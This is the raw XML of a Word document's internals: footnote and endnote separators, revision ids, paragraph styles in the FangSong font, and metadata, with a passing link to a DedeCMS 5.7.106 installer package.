        <w:ind w:firstLineChars="0" w:firstLine="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738A6C6" wp14:editId="1A7320BA">
            <wp:extent cx="5274310" cy="37268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1AF0" w14:textId="77777777" w:rsidR="004B19B5" w:rsidRDefault="004B19B5" w:rsidP="00705A99">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6115A934" w14:textId="77777777" w:rsidR="004B19B5" w:rsidRDefault="004B19B5" w:rsidP="0070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7CC3" w14:textId="77777777" w:rsidR="004B19B5" w:rsidRDefault="004B19B5" w:rsidP="00705A99">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5832687B" w14:textId="77777777" w:rsidR="004B19B5" w:rsidRDefault="004B19B5" w:rsidP="0070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E9BDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD3E9BDD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ViNTMyZTBmYjViOGI3ZGQ5MjhkNjE5MDJlMGJiNTQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="0078712B"/>
    <w:rsid w:val="000057EA"/>
    <w:rsid w:val="0006000C"/>
    <w:rsid w:val="000E0CFA"/>
    <w:rsid w:val="00131DA4"/>
    <w:rsid w:val="001F15C6"/>
    <w:rsid w:val="0025100D"/>
    <w:rsid w:val="002B32D9"/>
    <w:rsid w:val="002B6FB5"/>
    <w:rsid w:val="002D0B2A"/>
    <w:rsid w:val="002E22F7"/>
    <w:rsid w:val="00361277"/>
    <w:rsid w:val="00375CCE"/>
    <w:rsid w:val="003A78D9"/>
    <w:rsid w:val="003C6EF5"/>
    <w:rsid w:val="003F1296"/>
    <w:rsid w:val="004435E1"/>
    <w:rsid w:val="00452910"/>
    <w:rsid w:val="004B0A83"/>
    <w:rsid w:val="004B19B5"/>
    <w:rsid w:val="004C1793"/>
    <w:rsid w:val="004D79F3"/>
    <w:rsid w:val="004E1BBB"/>
    <w:rsid w:val="004E4F70"/>
    <w:rsid w:val="004F3E9D"/>
    <w:rsid w:val="00512D3E"/>
    <w:rsid w:val="00516859"/>
    <w:rsid w:val="005B758B"/>
    <w:rsid w:val="005F1959"/>
    <w:rsid w:val="00627A6A"/>
    <w:rsid w:val="00633A4A"/>
    <w:rsid w:val="006A1D6C"/>
    <w:rsid w:val="006C2EAA"/>
    <w:rsid w:val="006E30B6"/>
    <w:rsid w:val="006F0165"/>
    <w:rsid w:val="00705A99"/>
    <w:rsid w:val="00785DEB"/>
    <w:rsid w:val="0078712B"/>
    <w:rsid w:val="007D0BA6"/>
    <w:rsid w:val="007F1F6A"/>
    <w:rsid w:val="00860955"/>
    <w:rsid w:val="00886C87"/>
    <w:rsid w:val="00887D7E"/>
    <w:rsid w:val="00961F8D"/>
    <w:rsid w:val="00963091"/>
    <w:rsid w:val="00992E1C"/>
    <w:rsid w:val="009A6E42"/>
    <w:rsid w:val="009B39E8"/>
    <w:rsid w:val="009E77A9"/>
    <w:rsid w:val="00A00FDD"/>
    <w:rsid w:val="00A061CB"/>
    <w:rsid w:val="00A21148"/>
    <w:rsid w:val="00A609F0"/>
    <w:rsid w:val="00A97EAA"/>
    <w:rsid w:val="00AC0119"/>
    <w:rsid w:val="00AC2EA2"/>
    <w:rsid w:val="00B63775"/>
    <w:rsid w:val="00BB6D88"/>
    <w:rsid w:val="00BC4C3E"/>
    <w:rsid w:val="00C14A5F"/>
    <w:rsid w:val="00C401EF"/>
    <w:rsid w:val="00CB0976"/>
    <w:rsid w:val="00D70244"/>
    <w:rsid w:val="00D727C5"/>
    <w:rsid w:val="00DA5227"/>
    <w:rsid w:val="00E24FC3"/>
    <w:rsid w:val="00E33399"/>
    <w:rsid w:val="00E33B3D"/>
    <w:rsid w:val="00F524F5"/>
    <w:rsid w:val="00F70684"/>
    <w:rsid w:val="00FD0FEA"/>
    <w:rsid w:val="021952DC"/>
    <w:rsid w:val="11E06E41"/>
    <w:rsid w:val="15E3766F"/>
    <w:rsid w:val="1D2B18B9"/>
    <w:rsid w:val="1EAB3DBD"/>
    <w:rsid w:val="294206B6"/>
    <w:rsid w:val="29C33735"/>
    <w:rsid w:val="2C573847"/>
    <w:rsid w:val="34960C3E"/>
    <w:rsid w:val="379E56B4"/>
    <w:rsid w:val="39012385"/>
    <w:rsid w:val="3BBD1E25"/>
    <w:rsid w:val="3F8A6B26"/>
    <w:rsid w:val="41EC0D67"/>
    <w:rsid w:val="480D1A37"/>
    <w:rsid w:val="496D3711"/>
    <w:rsid w:val="49D15412"/>
    <w:rsid w:val="4BB430E1"/>
    <w:rsid w:val="535D7D17"/>
    <w:rsid w:val="557F21C6"/>
    <w:rsid w:val="5DC82230"/>
    <w:rsid w:val="63B42170"/>
    <w:rsid w:val="64AD38C1"/>
    <w:rsid w:val="68024591"/>
    <w:rsid w:val="6E042670"/>
    <w:rsid w:val="6FC0720B"/>
    <w:rsid w:val="707D00C0"/>
    <w:rsid w:val="7113443A"/>
    <w:rsid w:val="72C07522"/>
    <w:rsid w:val="797F1E79"/>
    <w:rsid w:val="79A547A7"/>
    <w:rsid w:val="7B5A38B2"/>
    <w:rsid w:val="7DA41F1A"/>
    <w:rsid w:val="7F8D69DE"/>
    <w:rsid w:val="7FE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DDC38"/>
  <w15:docId w15:val="{9EF1A729-51F5-41CA-B342-21F6F96E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wordWrap w:val="0"/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0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qFormat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10">
    <w:name w:val="正文1"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="仿宋"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="00705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705A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705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705A9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05A99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="0070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87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87D7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/install/index.php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updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.106-UTF8.zi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94660-9735-4EDD-8B77-DBEA2FD5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凌空</dc:creator>
  <cp:lastModifiedBy>016 CN</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-29T01:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-2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BE1C4494BBF49E285AA0D06EFF0E4C2</vt:lpwstr>
  </property>
</Properties>
</file>